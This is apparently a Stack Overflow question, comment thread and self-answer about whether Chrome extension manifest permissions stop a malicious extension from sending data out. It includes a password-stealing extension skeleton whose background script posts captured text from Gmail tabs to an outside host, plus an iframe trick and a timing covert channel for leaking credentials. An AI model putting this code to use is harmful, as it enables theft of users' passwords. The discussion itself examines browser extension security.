# unsecure extension, url declared in manifest.json "permissions"

Tags: javascript, google-chrome, security, web, google-chrome-extension

**Edit** : thanks to @wOxxOm who pointed that the url in `"permissions"` is treated as `"url/*"`,

it seems that any extension having a `http://  .json` in its permission is unsecure. This is really weird to me, since not treating it as `"/*"` would make it secure. Why `chrome & firefox` made it this way ? Did I miss something about the **same origin policy** ?

---

I'd like to know if I correctly understand how Chrome allows or disallows an extension sending its data (stolen passwords) to sites specified in `"permissions"` field, for example, in the following `manifest.json`:

```
    {
      "manifest_version": 2,
      "name": "insoumis", "version": "1.1.4.21", "description": "",
      "background": {
        "scripts": ["background.js"], "persistent": false 
      },
      "content_scripts": [
        {
          // can inject code in any page
          "matches": ["http://*/*","https://*/*"],
          "js": ["content.js"]
        }
      ],
      "permissions" : [
        "declarativeContent","tabs","storage","notifications","activeTab",
        // but cannot send back the stolen passwords
        "http://insoumis.online/data.json"
      ]
    }
```

It cannot write anywhere on the web, but can only read `http://insoumis.online/data.json`?

And if I replace this line with `http://insoumis.online/*` it won't be limited to that URL anymore, thus allowing me to use XMLHttpRequest on the entire host and post my data to any URL within that host like shown in the code below?

```
/*** -------- content.js -------- ***/
    function injectedCode() {
        var stolen = document.createElement("div"); stolen.id = "stolenPasswords"; document.body.appendChild(div);
        // do something with the webpage document and window, add some callbacks when 
        // the user types his password
        // put the result in div#stolenPasswords.innerText
    }

    browser.runtime.onMessage.addListener(function(request, sender, sendResponse) {
        // wait for messages from background.js
        var stolen = document.getElementById("stolenPasswords");
        if (stolen) {
            if (stolen.innerText) sendResponse(stolen.innerText);
        }
        else {
            var scriptContent = '('+injectedCode+')();'; 
            var script = document.createElement('script'); script.appendChild(document.createTextNode(scriptContent)); 
            document.body.appendChild(script);
        }
    });
    
/*** -------- background.js -------- ***/
    function infiniteLoop(tab) {
        browser.tabs.sendMessage(tab.id, {text: '...'}, function(response){
            if (response) {
                var xhr = new XMLHttpRequest();
                // put in the url the stolen passwords, the webserver will get them
                xhr.open("GET", "http://insoumis.online/" + response;, true);
                xhr.send();
            }                           
        });
        setTimeout(function() { infiniteLoop(tab); },20000);
    }
    browser.tabs.onUpdated.addListener(function (tabId, changeInfo, tab) {
        if (tab.url.indexOf('gmail.com') != -1) infiniteLoop(tab);
    });
```

Comment: I don't understand the question, but I can tell you one thing about `"permissions"` key: the entire host is allowed regardless of path, see [the documentation](https://developer.chrome.com/extensions/match_patterns): `The path must be present in a host permission, but is always treated as /*`.

Comment: @wOxxOm  Say I'm the developer of adblock. Can I steal the passwords of 1 billions people or not ? Which `manifest.json` allows to do that and which does not ? So you are saying my `manifest.json` is unsecure because my `background.js` can send some data out on the web.

Comment: Any extension that runs content scripts can steal passwords, including AdBlock. If you want a detailed answer, try searching, this question was asked before, several times even.

Comment: Well I provided a detailed code from what I tried/experimented.

Comment: @wOxxOm  In that case it is weird : why there isn't any `read-only` property in the `permissions` allowing to secure the extensions in the way I explained in my question ?

Comment: @wOxxOm   ???? My question is about the `manifest.json`  allowing or not to steal passwords of users who installed my extension from the chrome webstore

Comment: @wOxxOm Tks, I just tried (with a sample code) what you said about the documentation interpreting it as `/*` and you are right.  So again isn't this weird ? If they didn't interpret it as  `/*` it would be secured, right ?

Comment: @wOxxOm  See https://developer.chrome.com/extensions/xhr they made a whole article about that point, so why did they let this huge security flaw, treating everything as `/*` ?  It has to mean I missed something

Comment: Ugh, it doesn't matter if the path is specified in `"permissions"` because you can simply open that URL in a tab/iframe, and inject a content script that will be able to use the XMLHttpRequest anywhere on the site. I still suspect this question was answered before.

Comment: @wOxxOm I don't get this. The page is say http://gmail.com/login and because of the "same origin policy" it cannot make any request to http://insoumis.online/, right ? If I'm a hacker, the target is to send the data (stolen passwords) to http://insoumis.online/ and only the extension can (thanks to the manifest)

Comment: Of course, if you find an other question with the answer I will be glad to read it. Tks again for pointing the documentation about `/*`

Comment: No, it means you can open a tab/iframe to `http://insoumis.online/some-allowed-url-in-permissions` and inject a content script there, which will be able to use the entire `http://insoumis.online/` (if that site doesn't restrict it with CSP). Also, I won't be looking for the existing question, I'm lazy.

Comment: @wOxxOm In practice, the url in `"permissions"`says we can make a request to it In `background.js`. See the answer I proposed below, do you agree ?

Comment: Well, I don't see the point of your concern. Even a content script can do a lot of stuff if the web page doesn't restrict it via CSP, so any extension that has content scripts can also "steal passwords" and otherwise infringe upon your privacy.

Comment: @wOxxOm And yes you are right that the url in `"content"` is important too, in the scenario you said : allowing us to inject content script into it

Comment: @wOxxOm Yes, I didn't get that, you are right. My concern is "how to make extensions secured"

Comment: @wOxxOm I think I understood now why extensions are insecured : because it is really hard/impossible - once it can inject content script - to make it secured. Tks a lot.

Answer (score 0):

I think I understood now why extensions are insecured : because it is really hard/impossible - once it can inject content script - to make it secured.

Injecting content script means allowing the code to steal the passwords when they are typed.

Then it is almost impossible to forbid the code to send them on the internet : in any page, add an `<iframe url="http://myserver.com/?login=...&pwd=...">` and if needed, use the trick below

---

Even if you are only allowed to make a `GET` request to only one url :

```
 var xhr = new XMLHttpRequest();
 xhr.open("GET", "http://myserver.com/data.json", true);
```

it is possible to send a small amount of data to `myserver.com` :

- make a request an odd day for communicating a `1`
- an even day for communicating a `0`

So installing an extension is really insecure whenever there is at least one `url` in its `"permissions"` and "`http://*"` in the `"content_scripts"`  `matches`

Comment: `"permissions"`or `"matches"` as @wOxxOm said